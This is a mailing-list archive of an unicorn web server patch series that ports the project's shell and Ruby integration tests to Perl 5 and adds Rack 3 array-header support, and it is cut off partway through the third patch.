+++ /dev/null
@@ -1,7 +0,0 @@
-# -*- encoding: binary -*-
-# compatibility module for Ruby <= 2.4, remove when we go Ruby 2.5+
-module Unicorn::WriteSplat # :nodoc:
-  def write(*arg) # :nodoc:
-    super(arg.join(''))
-  end
-end
diff --git a/t/README b/t/README
index d09c715..7bd093d 100644
--- a/t/README
+++ b/t/README
@@ -14,7 +14,7 @@ Old tests are in Bourne shell and slowly being ported to Perl 5.
 
 == Requirements
 
-* {Ruby 2.0.0+}[https://www.ruby-lang.org/en/]
+* {Ruby 2.5.0+}[https://www.ruby-lang.org/en/]
 * {Perl 5.14+}[https://www.perl.org/] # your distro should have it
 * {GNU make}[https://www.gnu.org/software/make/]
 * {curl}[https://curl.haxx.se/]
diff --git a/unicorn.gemspec b/unicorn.gemspec
index 85183d9..e7e3ef7 100644
--- a/unicorn.gemspec
+++ b/unicorn.gemspec
@@ -25,11 +25,11 @@
   s.homepage = 'https://yhbt.net/unicorn/'
   s.test_files = test_files
 
-  # 2.0.0 is the minimum supported version. We don't specify
+  # 2.5.0 is the minimum supported version. We don't specify
   # a maximum version to make it easier to test pre-releases,
   # but we do warn users if they install unicorn on an untested
   # version in extconf.rb
-  s.required_ruby_version = ">= 2.0.0"
+  s.required_ruby_version = ">= 2.5.0"
 
   # We do not have a hard dependency on rack, it's possible to load
   # things which respond to #call.  HTTP status lines in responses

^ permalink raw reply related	[relevance 1%]

* [PATCH 00-23/23] start porting tests to Perl5
@ 2023-06-05 10:32  1% Eric Wong
  0 siblings, 0 replies; 200+ results
From: Eric Wong @ 2023-06-05 10:32 UTC (permalink / raw)
  To: unicorn-public

[-- Attachment #1: Type: text/plain, Size: 4179 bytes --]

Still a lot more work to do, but at least socat is no longer a
test dependency.  Perl5 is installed on far more systems than
socat.

Ruby introduces breaking changes every year and I can't trust
tests to work as they were originally intended anymore.
Perl 5 doesn't have perfect backwards compatibility, either, but
it's the least bad of any widely-installed scripting language.

Note that 23/23 introduces a subtle bugfix which changes
behavior for systemd users

Patches are attached to reduce load on SMTP servers.
Some more patches to come as I deal with Ruby 3.x deprecation
warnings :<
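
For readers unfamiliar with sd_listen_fds(3): the spawn helper in
t/lib.perl (patch 01/23) pretends to be systemd by placing inherited
listeners at FD 3 and up with close-on-exec cleared, then setting
LISTEN_PID/LISTEN_FDS.  A rough self-contained sketch of that
convention (the child here just verifies FD 3 instead of exec-ing
unicorn):

```perl
use v5.14;
use Fcntl qw(F_SETFD);
use POSIX qw(dup2);
use IO::Socket::INET;

my $srv = IO::Socket::INET->new(Listen => 5, LocalAddr => '127.0.0.1',
				Proto => 'tcp') or die "listen: $!";
my $pid = fork // die "fork: $!";
if ($pid == 0) {
	my $pfd = fileno($srv);
	if ($pfd == 3) { # already in place, just clear FD_CLOEXEC
		fcntl($srv, F_SETFD, 0) or die "F_SETFD: $!";
	} else { # dup2 clears close-on-exec on the new descriptor
		dup2($pfd, 3) // die "dup2: $!";
	}
	$ENV{LISTEN_PID} = $$;
	$ENV{LISTEN_FDS} = 1;
	# a real test would exec unicorn here; this child only checks
	# that FD 3 survived as a socket
	exec $^X, '-e',
		'open(my $fh, "+<&=", 3) or exit 1; exit(-S $fh ? 0 : 1)';
	die "exec: $!";
}
waitpid($pid, 0) == $pid or die "waitpid: $!";
```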

Eric Wong (23):
  switch unit/test_response.rb to Perl 5 integration test
  support rack 3 multi-value headers
  port t0018-write-on-close.sh to Perl 5
  port t0000-http-basic.sh to Perl 5
  port t0002-parser-error.sh to Perl 5
  t/integration.t: use start_req to simplify test slightly
  port t0011-active-unix-socket.sh to Perl 5
  port t0100-rack-input-tests.sh to Perl 5
  tests: use autodie to simplify error checking
  port t0019-max_header_len.sh to Perl 5
  test_exec: drop sd_listen_fds emulation test
  test_exec: drop test_basic and test_config_ru_alt_path
  tests: check_stderr consistently in Perl 5 tests
  tests: consistent tcp_start and unix_start across Perl 5 tests
  port t9000-preread-input.sh to Perl 5
  port t/t0116-client_body_buffer_size.sh to Perl 5
  tests: get rid of sha1sum.rb and rsha1() sh function
  early_hints supports Rack 3 array headers
  test_server: drop early_hints test
  t/integration.t: switch PUT tests to MD5, reuse buffers
  tests: move test_upload.rb tests to t/integration.t
  drop redundant IO#close_on_exec=false calls
  LISTEN_FDS-inherited sockets are immortal across SIGHUP

 GNUmakefile                                |   7 +-
 lib/unicorn/http_server.rb                 |  12 +-
 t/README                                   |  21 +-
 t/active-unix-socket.t                     | 113 +++++++
 t/bin/content-md5-put                      |  36 ---
 t/bin/sha1sum.rb                           |  17 --
 t/{t0116.ru => client_body_buffer_size.ru} |   2 -
 t/client_body_buffer_size.t                |  82 ++++++
 t/integration.ru                           | 114 +++++++
 t/integration.t                            | 326 +++++++++++++++++++++
 t/lib.perl                                 | 217 ++++++++++++++
 t/preread_input.ru                         |  21 +-
 t/rack-input-tests.ru                      |  21 --
 t/t0000-http-basic.sh                      |  50 ----
 t/t0002-parser-error.sh                    |  94 ------
 t/t0011-active-unix-socket.sh              |  79 -----
 t/t0018-write-on-close.sh                  |  23 --
 t/t0019-max_header_len.sh                  |  49 ----
 t/t0100-rack-input-tests.sh                | 124 --------
 t/t0116-client_body_buffer_size.sh         |  80 -----
 t/t9000-preread-input.sh                   |  48 ---
 t/test-lib.sh                              |   4 -
 t/write-on-close.ru                        |  11 -
 test/exec/test_exec.rb                     |  57 ----
 test/unit/test_response.rb                 | 111 -------
 test/unit/test_server.rb                   |  31 --
 test/unit/test_upload.rb                   | 301 -------------------
 27 files changed, 891 insertions(+), 1160 deletions(-)
 create mode 100644 t/active-unix-socket.t
 delete mode 100755 t/bin/content-md5-put
 delete mode 100755 t/bin/sha1sum.rb
 rename t/{t0116.ru => client_body_buffer_size.ru} (82%)
 create mode 100644 t/client_body_buffer_size.t
 create mode 100644 t/integration.ru
 create mode 100644 t/integration.t
 create mode 100644 t/lib.perl
 delete mode 100644 t/rack-input-tests.ru
 delete mode 100755 t/t0000-http-basic.sh
 delete mode 100755 t/t0002-parser-error.sh
 delete mode 100755 t/t0011-active-unix-socket.sh
 delete mode 100755 t/t0018-write-on-close.sh
 delete mode 100755 t/t0019-max_header_len.sh
 delete mode 100755 t/t0100-rack-input-tests.sh
 delete mode 100755 t/t0116-client_body_buffer_size.sh
 delete mode 100755 t/t9000-preread-input.sh
 delete mode 100644 t/write-on-close.ru
 delete mode 100644 test/unit/test_response.rb
 delete mode 100644 test/unit/test_upload.rb

[-- Attachment #2: 0001-switch-unit-test_response.rb-to-Perl-5-integration-t.patch --]
[-- Type: text/x-diff, Size: 15667 bytes --]

From 086e397abc0126556af24df77a976671294df2ee Mon Sep 17 00:00:00 2001
From: Eric Wong <BOFH@YHBT.net>
Date: Mon, 5 Jun 2023 10:12:30 +0000
Subject: [PATCH 01/23] switch unit/test_response.rb to Perl 5 integration test

http_response_write may benefit from API changes for Rack 3
support.

Since there's no benefit I can see from using a unit test,
switch to an integration test to avoid having to maintain the
unit test if our internal http_response_write method changes.

Of course, I can't trust tests written in Ruby since I've had to
put up with a constant stream of incompatibilities over the past
two decades :<   Perl is more widely installed than socat[1], and
nearly all the Perl I wrote 20 years ago still works
unmodified today.

[1] the rarest dependency of the Bourne shell integration tests
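
The core trick the new Perl tests lean on is localizing `$/' to the
blank line terminating an HTTP header, so one readline (plus chomp)
grabs the status line and all headers at once.  A self-contained
sketch, with a socketpair standing in for a real unicorn connection
(helper name hypothetical):

```perl
use v5.14;
use Socket qw(AF_UNIX SOCK_STREAM PF_UNSPEC);

sub read_response_head {
	my ($c) = @_;
	local $/ = "\r\n\r\n"; # affects both readline and chomp
	chomp(my $head = readline($c));
	my ($status, @hdr) = split(/\r\n/, $head);
	($status, \@hdr);
}

socketpair(my $rd, my $wr, AF_UNIX, SOCK_STREAM, PF_UNSPEC)
	or die "socketpair: $!";
syswrite($wr, "HTTP/1.1 200 OK\r\nX-Test: yes\r\n\r\nbody")
	// die "write: $!";
my ($status, $hdr) = read_response_head($rd);
# $status: "HTTP/1.1 200 OK"; @$hdr: ("X-Test: yes")
```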
---
 GNUmakefile                |   5 +-
 t/README                   |  24 +++--
 t/integration.ru           |  38 ++++++++
 t/integration.t            |  64 +++++++++++++
 t/lib.perl                 | 189 +++++++++++++++++++++++++++++++++++++
 test/unit/test_response.rb | 111 ----------------------
 6 files changed, 313 insertions(+), 118 deletions(-)
 create mode 100644 t/integration.ru
 create mode 100644 t/integration.t
 create mode 100644 t/lib.perl
 delete mode 100644 test/unit/test_response.rb

diff --git a/GNUmakefile b/GNUmakefile
index 0e08ef0..5cca189 100644
--- a/GNUmakefile
+++ b/GNUmakefile
@@ -86,7 +86,7 @@ $(tmp_bin)/%: bin/% | $(tmp_bin)
 bins: $(tmp_bins)
 
 t_log := $(T_log) $(T_n_log)
-test: $(T) $(T_n)
+test: $(T) $(T_n) test-prove
 	@cat $(t_log) | $(MRI) test/aggregate.rb
 	@$(RM) $(t_log)
 
@@ -141,6 +141,9 @@ t/random_blob:
 
 test-integration: $(T_sh)
 
+test-prove:
+	prove -vw
+
 check: test-require test test-integration
 test-all: check
 
diff --git a/t/README b/t/README
index 14de559..8a5243e 100644
--- a/t/README
+++ b/t/README
@@ -5,16 +5,24 @@ TCP ports or Unix domain sockets.  They're all designed to run
 concurrently with other tests to minimize test time, but tests may be
 run independently as well.
 
-We write our tests in Bourne shell because that's what we're
-comfortable writing integration tests with.
+New tests are written in Perl 5 because we need a stable language
+to test real-world behavior and Ruby introduces incompatibilities
+at a far faster rate than Perl 5.  Perl is Ruby's older cousin, so
+it should be easy-to-learn for Rubyists.
+
+Old tests are in Bourne shell, but the socat(1) dependency was probably
+too rare compared to Perl 5.
 
 == Requirements
 
-* {Ruby 2.0.0+}[https://www.ruby-lang.org/en/] (duh!)
+* {Ruby 2.0.0+}[https://www.ruby-lang.org/en/]
+* {Perl 5.14+}[https://www.perl.org/] # your distro should have it
 * {GNU make}[https://www.gnu.org/software/make/]
+
+The following requirements will eventually be dropped.
+
 * {socat}[http://www.dest-unreach.org/socat/]
 * {curl}[https://curl.haxx.se/]
-* standard UNIX shell utilities (Bourne sh, awk, sed, grep, ...)
 
 We do not use bashisms or any non-portable, non-POSIX constructs
 in our shell code.  We use the "pipefail" option if available and
@@ -26,9 +34,13 @@ with {dash}[http://gondor.apana.org.au/~herbert/dash/] and
 
 To run the entire test suite with 8 tests running at once:
 
-  make -j8
+  make -j8 && prove -vw
+
+To run one individual test (Perl5):
+
+  prove -vw t/integration.t
 
-To run one individual test:
+To run one individual test (shell):
 
   make t0000-simple-http.sh
 
diff --git a/t/integration.ru b/t/integration.ru
new file mode 100644
index 0000000..6ef873c
--- /dev/null
+++ b/t/integration.ru
@@ -0,0 +1,38 @@
+#!ruby
+# Copyright (C) unicorn hackers <unicorn-public@80x24.org>
+# License: GPL-3.0+ <https://www.gnu.org/licenses/gpl-3.0.txt>
+
+# this goes for t/integration.t  We'll try to put as many tests
+# in here as possible to avoid startup overhead of Ruby.
+
+$orig_rack_200 = nil
+def tweak_status_code
+  $orig_rack_200 = Rack::Utils::HTTP_STATUS_CODES[200]
+  Rack::Utils::HTTP_STATUS_CODES[200] = "HI"
+  [ 200, {}, [] ]
+end
+
+def restore_status_code
+  $orig_rack_200 or return [ 500, {}, [] ]
+  Rack::Utils::HTTP_STATUS_CODES[200] = $orig_rack_200
+  [ 200, {}, [] ]
+end
+
+run(lambda do |env|
+  case env['REQUEST_METHOD']
+  when 'GET'
+    case env['PATH_INFO']
+    when '/rack-2-newline-headers'; [ 200, { 'X-R2' => "a\nb\nc" }, [] ]
+    when '/nil-header-value'; [ 200, { 'X-Nil' => nil }, [] ]
+    when '/unknown-status-pass-through'; [ '666 I AM THE BEAST', {}, [] ]
+    end # case PATH_INFO (GET)
+  when 'POST'
+    case env['PATH_INFO']
+    when '/tweak-status-code'; tweak_status_code
+    when '/restore-status-code'; restore_status_code
+    end # case PATH_INFO (POST)
+    # ...
+  when 'PUT'
+    # ...
+  end # case REQUEST_METHOD
+end) # run
diff --git a/t/integration.t b/t/integration.t
new file mode 100644
index 0000000..5569155
--- /dev/null
+++ b/t/integration.t
@@ -0,0 +1,64 @@
+#!perl -w
+# Copyright (C) unicorn hackers <unicorn-public@yhbt.net>
+# License: GPL-3.0+ <https://www.gnu.org/licenses/gpl-3.0.txt>
+
+use v5.14; BEGIN { require './t/lib.perl' };
+my $srv = tcp_server();
+my $t0 = time;
+my $ar = unicorn(qw(-E none t/integration.ru), { 3 => $srv });
+
+sub slurp_hdr {
+	my ($c) = @_;
+	local $/ = "\r\n\r\n"; # affects both readline+chomp
+	chomp(my $hdr = readline($c));
+	my ($status, @hdr) = split(/\r\n/, $hdr);
+	diag explain([ $status, \@hdr ]) if $ENV{V};
+	($status, \@hdr);
+}
+
+my ($c, $status, $hdr);
+
+# response header tests
+$c = tcp_connect($srv);
+print $c "GET /rack-2-newline-headers HTTP/1.0\r\n\r\n" or die $!;
+($status, $hdr) = slurp_hdr($c);
+like($status, qr!\AHTTP/1\.[01] 200\b!, 'status line valid');
+my $orig_200_status = $status;
+is_deeply([ grep(/^X-R2: /, @$hdr) ],
+	[ 'X-R2: a', 'X-R2: b', 'X-R2: c' ],
+	'rack 2 LF-delimited headers supported') or diag(explain($hdr));
+
+SKIP: { # Date header check
+	my @d = grep(/^Date: /i, @$hdr);
+	is(scalar(@d), 1, 'got one date header') or diag(explain(\@d));
+	eval { require HTTP::Date } or skip "HTTP::Date missing: $@", 1;
+	$d[0] =~ s/^Date: //i or die 'BUG: did not strip date: prefix';
+	my $t = HTTP::Date::str2time($d[0]);
+	ok($t >= $t0 && $t > 0 && $t <= time, 'valid date') or
+		diag(explain([$t, $!, \@d]));
+};
+
+# cf. <CAO47=rJa=zRcLn_Xm4v2cHPr6c0UswaFC_omYFEH+baSxHOWKQ@mail.gmail.com>
+$c = tcp_connect($srv);
+print $c "GET /nil-header-value HTTP/1.0\r\n\r\n" or die $!;
+($status, $hdr) = slurp_hdr($c);
+is_deeply([grep(/^X-Nil:/, @$hdr)], ['X-Nil: '],
+	'nil header value accepted for broken apps') or diag(explain($hdr));
+
+if ('TODO: ensure Rack::Utils::HTTP_STATUS_CODES is available') {
+	$c = tcp_connect($srv);
+	print $c "POST /tweak-status-code HTTP/1.0\r\n\r\n" or die $!;
+	($status, $hdr) = slurp_hdr($c);
+	like($status, qr!\AHTTP/1\.[01] 200 HI\b!, 'status tweaked');
+
+	$c = tcp_connect($srv);
+	print $c "POST /restore-status-code HTTP/1.0\r\n\r\n" or die $!;
+	($status, $hdr) = slurp_hdr($c);
+	is($status, $orig_200_status, 'original status restored');
+}
+
+
+# ... more stuff here
+undef $ar;
+diag slurp("$tmpdir/err.log") if $ENV{V};
+done_testing;
diff --git a/t/lib.perl b/t/lib.perl
new file mode 100644
index 0000000..dd9c6b7
--- /dev/null
+++ b/t/lib.perl
@@ -0,0 +1,189 @@
+#!perl -w
+# Copyright (C) unicorn hackers <unicorn-public@80x24.org>
+# License: GPL-3.0+ <https://www.gnu.org/licenses/gpl-3.0.txt>
+package UnicornTest;
+use v5.14;
+use parent qw(Exporter);
+use Test::More;
+use IO::Socket::INET;
+use POSIX qw(dup2 _exit setpgid :signal_h SEEK_SET F_SETFD);
+use File::Temp 0.19 (); # 0.19 for ->newdir
+our ($tmpdir, $errfh);
+our @EXPORT = qw(unicorn slurp tcp_server tcp_connect unicorn $tmpdir $errfh
+	SEEK_SET);
+
+my ($base) = ($0 =~ m!\b([^/]+)\.[^\.]+\z!);
+$tmpdir = File::Temp->newdir("unicorn-$base-XXXX", TMPDIR => 1);
+open($errfh, '>>', "$tmpdir/err.log") or die "open: $!";
+
+sub tcp_server {
+	my %opt = (
+		ReuseAddr => 1,
+		Proto => 'tcp',
+		Type => SOCK_STREAM,
+		Listen => SOMAXCONN,
+		Blocking => 0,
+		@_,
+	);
+	eval {
+		die 'IPv4-only' if $ENV{TEST_IPV4_ONLY};
+		require IO::Socket::INET6;
+		IO::Socket::INET6->new(%opt, LocalAddr => '[::1]')
+	} || eval {
+		die 'IPv6-only' if $ENV{TEST_IPV6_ONLY};
+		IO::Socket::INET->new(%opt, LocalAddr => '127.0.0.1')
+	} || BAIL_OUT "failed to create TCP server: $! ($@)";
+}
+
+sub tcp_host_port {
+	my ($s) = @_;
+	my ($h, $p) = ($s->sockhost, $s->sockport);
+	my $ipv4 = $s->sockdomain == AF_INET;
+	if (wantarray) {
+		$ipv4 ? ($h, $p) : ("[$h]", $p);
+	} else {
+		$ipv4 ? "$h:$p" : "[$h]:$p";
+	}
+}
+
+sub tcp_connect {
+	my ($dest, %opt) = @_;
+	my $addr = tcp_host_port($dest);
+	my $s = ref($dest)->new(
+		Proto => 'tcp',
+		Type => SOCK_STREAM,
+		PeerAddr => $addr,
+		%opt,
+	) or BAIL_OUT "failed to connect to $addr: $!";
+	$s->autoflush(1);
+	$s;
+}
+
+sub slurp {
+	open my $fh, '<', $_[0] or die "open($_[0]): $!";
+	local $/;
+	<$fh>;
+}
+
+sub spawn {
+	my $env = ref($_[0]) eq 'HASH' ? shift : undef;
+	my $opt = ref($_[-1]) eq 'HASH' ? pop : {};
+	my @cmd = @_;
+	my $old = POSIX::SigSet->new;
+	my $set = POSIX::SigSet->new;
+	$set->fillset or die "sigfillset: $!";
+	sigprocmask(SIG_SETMASK, $set, $old) or die "SIG_SETMASK: $!";
+	pipe(my ($r, $w)) or die "pipe: $!";
+	my $pid = fork // die "fork: $!";
+	if ($pid == 0) {
+		close $r;
+		$SIG{__DIE__} = sub {
+			warn(@_);
+			syswrite($w, my $num = $! + 0);
+			_exit(1);
+		};
+
+		# pretend to be systemd (cf. sd_listen_fds(3))
+		my $cfd;
+		for ($cfd = 0; ($cfd < 3) || defined($opt->{$cfd}); $cfd++) {
+			my $io = $opt->{$cfd} // next;
+			my $pfd = fileno($io) // die "fileno($io): $!";
+			if ($pfd == $cfd) {
+				fcntl($io, F_SETFD, 0) // die "F_SETFD: $!";
+			} else {
+				dup2($pfd, $cfd) // die "dup2($pfd, $cfd): $!";
+			}
+		}
+		if (($cfd - 3) > 0) {
+			$env->{LISTEN_PID} = $$;
+			$env->{LISTEN_FDS} = $cfd - 3;
+		}
+
+		if (defined(my $pgid = $opt->{pgid})) {
+			setpgid(0, $pgid) // die "setpgid(0, $pgid): $!";
+		}
+		$SIG{$_} = 'DEFAULT' for grep(!/^__/, keys %SIG);
+		if (defined(my $cd = $opt->{-C})) {
+			chdir $cd // die "chdir($cd): $!";
+		}
+		$old->delset(POSIX::SIGCHLD) or die "sigdelset CHLD: $!";
+		sigprocmask(SIG_SETMASK, $old) or die "SIG_SETMASK: ~CHLD: $!";
+		@ENV{keys %$env} = values(%$env) if $env;
+		exec { $cmd[0] } @cmd;
+		die "exec @cmd: $!";
+	}
+	close $w;
+	sigprocmask(SIG_SETMASK, $old) or die "SIG_SETMASK(old): $!";
+	if (my $cerrnum = do { local $/, <$r> }) {
+		$! = $cerrnum;
+		die "@cmd PID=$pid died: $!";
+	}
+	$pid;
+}
+
+sub which {
+	my ($file) = @_;
+	return $file if index($file, '/') >= 0;
+	for my $p (split(/:/, $ENV{PATH})) {
+		$p .= "/$file";
+		return $p if -x $p;
+	}
+	undef;
+}
+
+# returns an AutoReap object
+sub unicorn {
+	my %env;
+	if (ref($_[0]) eq 'HASH') {
+		my $e = shift;
+		%env = %$e;
+	}
+	my @args = @_;
+	push(@args, {}) if ref($args[-1]) ne 'HASH';
+	$args[-1]->{2} //= $errfh; # stderr default
+
+	state $ruby = which($ENV{RUBY} // 'ruby');
+	state $lib = File::Spec->rel2abs('lib');
+	state $ver = $ENV{TEST_RUBY_VERSION} // `$ruby -e 'print RUBY_VERSION'`;
+	state $eng = $ENV{TEST_RUBY_ENGINE} // `$ruby -e 'print RUBY_ENGINE'`;
+	state $ext = File::Spec->rel2abs("test/$eng-$ver/ext/unicorn_http");
+	state $exe = File::Spec->rel2abs('bin/unicorn');
+	my $pid = spawn(\%env, $ruby, '-I', $lib, '-I', $ext, $exe, @args);
+	UnicornTest::AutoReap->new($pid);
+}
+
+# automatically kill + reap children when this goes out-of-scope
+package UnicornTest::AutoReap;
+use v5.14;
+
+sub new {
+	my (undef, $pid) = @_;
+	bless { pid => $pid, owner => $$ }, __PACKAGE__
+}
+
+sub kill {
+	my ($self, $sig) = @_;
+	CORE::kill($sig // 'TERM', $self->{pid});
+}
+
+sub join {
+	my ($self, $sig) = @_;
+	my $pid = delete $self->{pid} or return;
+	CORE::kill($sig, $pid) if defined $sig;
+	my $ret = waitpid($pid, 0) // die "waitpid($pid): $!";
+	$ret == $pid or die "BUG: waitpid($pid) != $ret";
+}
+
+sub DESTROY {
+	my ($self) = @_;
+	return if $self->{owner} != $$;
+	$self->join('TERM');
+}
+
+package main; # inject ourselves into the t/*.t script
+UnicornTest->import;
+Test::More->import;
+# try to ensure ->DESTROY fires:
+$SIG{TERM} = sub { exit(15 + 128) };
+$SIG{INT} = sub { exit(2 + 128) };
+1;
diff --git a/test/unit/test_response.rb b/test/unit/test_response.rb
deleted file mode 100644
index fbe433f..0000000
--- a/test/unit/test_response.rb
+++ /dev/null
@@ -1,111 +0,0 @@
-# -*- encoding: binary -*-
-
-# Copyright (c) 2005 Zed A. Shaw
-# You can redistribute it and/or modify it under the same terms as Ruby 1.8 or
-# the GPLv2+ (GPLv3+ preferred)
-#
-# Additional work donated by contributors.  See git history
-# for more information.
-
-require './test/test_helper'
-require 'time'
-
-include Unicorn
-
-class ResponseTest < Test::Unit::TestCase
-  include Unicorn::HttpResponse
-
-  def test_httpdate
-    before = Time.now.to_i - 1
-    str = httpdate
-    assert_kind_of(String, str)
-    middle = Time.parse(str).to_i
-    after = Time.now.to_i
-    assert before <= middle
-    assert middle <= after
-  end
-
-  def test_response_headers
-    out = StringIO.new
-    http_response_write(out, 200, {"X-Whatever" => "stuff"}, ["cool"])
-    assert ! out.closed?
-
-    assert out.length > 0, "output didn't have data"
-  end
-
-  # ref: <CAO47=rJa=zRcLn_Xm4v2cHPr6c0UswaFC_omYFEH+baSxHOWKQ@mail.gmail.com>
-  def test_response_header_broken_nil
-    out = StringIO.new
-    http_response_write(out, 200, {"Nil" => nil}, %w(hysterical raisin))
-    assert ! out.closed?
-
-    assert_match %r{^Nil: \r\n}sm, out.string, 'nil accepted'
-  end
-
-  def test_response_string_status
-    out = StringIO.new
-    http_response_write(out,'200', {}, [])
-    assert ! out.closed?
-    assert out.length > 0, "output didn't have data"
-  end
-
-  def test_response_200
-    io = StringIO.new
-    http_response_write(io, 200, {}, [])
-    assert ! io.closed?
-    assert io.length > 0, "output didn't have data"
-  end
-
-  def test_response_with_default_reason
-    code = 400
-    io = StringIO.new
-    http_response_write(io, code, {}, [])
-    assert ! io.closed?
-    lines = io.string.split(/\r\n/)
-    assert_match(/.* Bad Request$/, lines.first,
-                 "wrong default reason phrase")
-  end
-
-  def test_rack_multivalue_headers
-    out = StringIO.new
-    http_response_write(out,200, {"X-Whatever" => "stuff\nbleh"}, [])
-    assert ! out.closed?
-    assert_match(/^X-Whatever: stuff\r\nX-Whatever: bleh\r\n/, out.string)
-  end
-
-  # Even though Rack explicitly forbids "Status" in the header hash,
-  # some broken clients still rely on it
-  def test_status_header_added
-    out = StringIO.new
-    http_response_write(out,200, {"X-Whatever" => "stuff"}, [])
-    assert ! out.closed?
-  end
-
-  def test_unknown_status_pass_through
-    out = StringIO.new
-    http_response_write(out,"666 I AM THE BEAST", {}, [] )
-    assert ! out.closed?
-    headers = out.string.split(/\r\n\r\n/).first.split(/\r\n/)
-    assert %r{\AHTTP/\d\.\d 666 I AM THE BEAST\z}.match(headers[0])
-  end
-
-  def test_modified_rack_http_status_codes_late
-    r, w = IO.pipe
-    pid = fork do
-      r.close
-      # Users may want to globally override the status text associated
-      # with an HTTP status code in their app.
-      Rack::Utils::HTTP_STATUS_CODES[200] = "HI"
-      http_response_write(w, 200, {}, [])
-      w.close
-    end
-    w.close
-    assert_equal "HTTP/1.1 200 HI\r\n", r.gets
-    r.read # just drain the pipe
-    pid, status = Process.waitpid2(pid)
-    assert status.success?, status.inspect
-  ensure
-    r.close
-    w.close unless w.closed?
-  end
-end

[-- Attachment #3: 0002-support-rack-3-multi-value-headers.patch --]
[-- Type: text/x-diff, Size: 1710 bytes --]

From ea0559c700fa029044464de4bd572662c10b7273 Mon Sep 17 00:00:00 2001
From: Eric Wong <BOFH@YHBT.net>
Date: Mon, 5 Jun 2023 10:12:31 +0000
Subject: [PATCH 02/23] support rack 3 multi-value headers

The first step in adding Rack 3 support.  Rack supports
multi-value headers via array rather than newlines.

Tested-by: Martin Posthumus <martin.posthumus@gmail.com>
Link: https://yhbt.net/unicorn-public/7c851d8a-bc57-7df8-3240-2f5ab831c47c@gmail.com/
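
[Editor's note: for context, the difference between the two header forms can be
sketched as follows. This is an illustration of the normalization a server must
perform, not unicorn's actual implementation.]

```ruby
# Emit one header line per value, accepting both the Rack 2
# newline-separated form and the Rack 3 array form.
def header_lines(name, value)
  values = value.is_a?(Array) ? value : value.to_s.split("\n")
  values.map { |v| "#{name}: #{v}\r\n" }
end

header_lines('X-R2', "a\nb\nc")  # Rack 2 style
header_lines('x-r3', %w(a b c))  # Rack 3 style, same wire output
```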
---
 t/integration.ru | 1 +
 t/integration.t  | 9 +++++++++
 2 files changed, 10 insertions(+)

diff --git a/t/integration.ru b/t/integration.ru
index 6ef873c..5183217 100644
--- a/t/integration.ru
+++ b/t/integration.ru
@@ -23,6 +23,7 @@ def restore_status_code
   when 'GET'
     case env['PATH_INFO']
     when '/rack-2-newline-headers'; [ 200, { 'X-R2' => "a\nb\nc" }, [] ]
+    when '/rack-3-array-headers'; [ 200, { 'x-r3' => %w(a b c) }, [] ]
     when '/nil-header-value'; [ 200, { 'X-Nil' => nil }, [] ]
     when '/unknown-status-pass-through'; [ '666 I AM THE BEAST', {}, [] ]
     end # case PATH_INFO (GET)
diff --git a/t/integration.t b/t/integration.t
index 5569155..e876c71 100644
--- a/t/integration.t
+++ b/t/integration.t
@@ -38,6 +38,15 @@ SKIP: { # Date header check
 		diag(explain([$t, $!, \@d]));
 };
 
+
+$c = tcp_connect($srv);
+print $c "GET /rack-3-array-headers HTTP/1.0\r\n\r\n" or die $!;
+($status, $hdr) = slurp_hdr($c);
+is_deeply([ grep(/^x-r3: /, @$hdr) ],
+	[ 'x-r3: a', 'x-r3: b', 'x-r3: c' ],
+	'rack 3 array headers supported') or diag(explain($hdr));
+
+
 # cf. <CAO47=rJa=zRcLn_Xm4v2cHPr6c0UswaFC_omYFEH+baSxHOWKQ@mail.gmail.com>
 $c = tcp_connect($srv);
 print $c "GET /nil-header-value HTTP/1.0\r\n\r\n" or die $!;

[-- Attachment #4: 0003-port-t0018-write-on-close.sh-to-Perl-5.patch --]
[-- Type: text/x-diff, Size: 4091 bytes --]

From 295a6c616f8840bc04617a377c04c3422aeebddc Mon Sep 17 00:00:00 2001
From: Eric Wong <BOFH@YHBT.net>
Date: Mon, 5 Jun 2023 10:12:32 +0000
Subject: [PATCH 03/23] port t0018-write-on-close.sh to Perl 5

This doesn't require restarting, so it's a perfect candidate.
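
[Editor's note: the response body in this test arrives as a single chunked
payload, "7\r\nGoodbye\r\n0\r\n\r\n". A minimal decoder for such a body might
look like the sketch below; the test itself relies on HTTP::Tiny to de-chunk.]

```ruby
# Minimal chunked-transfer decoder, sufficient for simple bodies like
# "7\r\nGoodbye\r\n0\r\n\r\n" (no trailers).  Illustrative only.
def decode_chunked(buf)
  out = +''
  until buf.empty?
    size_line, buf = buf.split("\r\n", 2)
    len = size_line.to_i(16)
    break if len.zero?           # terminating zero-length chunk
    out << buf[0, len]
    buf = buf[(len + 2)..] || '' # skip chunk data plus trailing CRLF
  end
  out
end

decode_chunked("7\r\nGoodbye\r\n0\r\n\r\n") # => "Goodbye"
```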
---
 t/integration.ru          | 15 +++++++++++++++
 t/integration.t           | 14 +++++++++++++-
 t/lib.perl                |  2 +-
 t/t0018-write-on-close.sh | 23 -----------------------
 t/write-on-close.ru       | 11 -----------
 5 files changed, 29 insertions(+), 36 deletions(-)
 delete mode 100755 t/t0018-write-on-close.sh
 delete mode 100644 t/write-on-close.ru

diff --git a/t/integration.ru b/t/integration.ru
index 5183217..12f5d48 100644
--- a/t/integration.ru
+++ b/t/integration.ru
@@ -18,6 +18,20 @@ def restore_status_code
   [ 200, {}, [] ]
 end
 
+class WriteOnClose
+  def each(&block)
+    @callback = block
+  end
+
+  def close
+    @callback.call "7\r\nGoodbye\r\n0\r\n\r\n"
+  end
+end
+
+def write_on_close
+  [ 200, { 'transfer-encoding' => 'chunked' }, WriteOnClose.new ]
+end
+
 run(lambda do |env|
   case env['REQUEST_METHOD']
   when 'GET'
@@ -26,6 +40,7 @@ def restore_status_code
     when '/rack-3-array-headers'; [ 200, { 'x-r3' => %w(a b c) }, [] ]
     when '/nil-header-value'; [ 200, { 'X-Nil' => nil }, [] ]
     when '/unknown-status-pass-through'; [ '666 I AM THE BEAST', {}, [] ]
+    when '/write_on_close'; write_on_close
     end # case PATH_INFO (GET)
   when 'POST'
     case env['PATH_INFO']
diff --git a/t/integration.t b/t/integration.t
index e876c71..3ab5c90 100644
--- a/t/integration.t
+++ b/t/integration.t
@@ -4,6 +4,7 @@
 
 use v5.14; BEGIN { require './t/lib.perl' };
 my $srv = tcp_server();
+my $host_port = tcp_host_port($srv);
 my $t0 = time;
 my $ar = unicorn(qw(-E none t/integration.ru), { 3 => $srv });
 
@@ -66,8 +67,19 @@ if ('TODO: ensure Rack::Utils::HTTP_STATUS_CODES is available') {
 	is($status, $orig_200_status, 'original status restored');
 }
 
+SKIP: {
+	eval { require HTTP::Tiny } or skip "HTTP::Tiny missing: $@", 1;
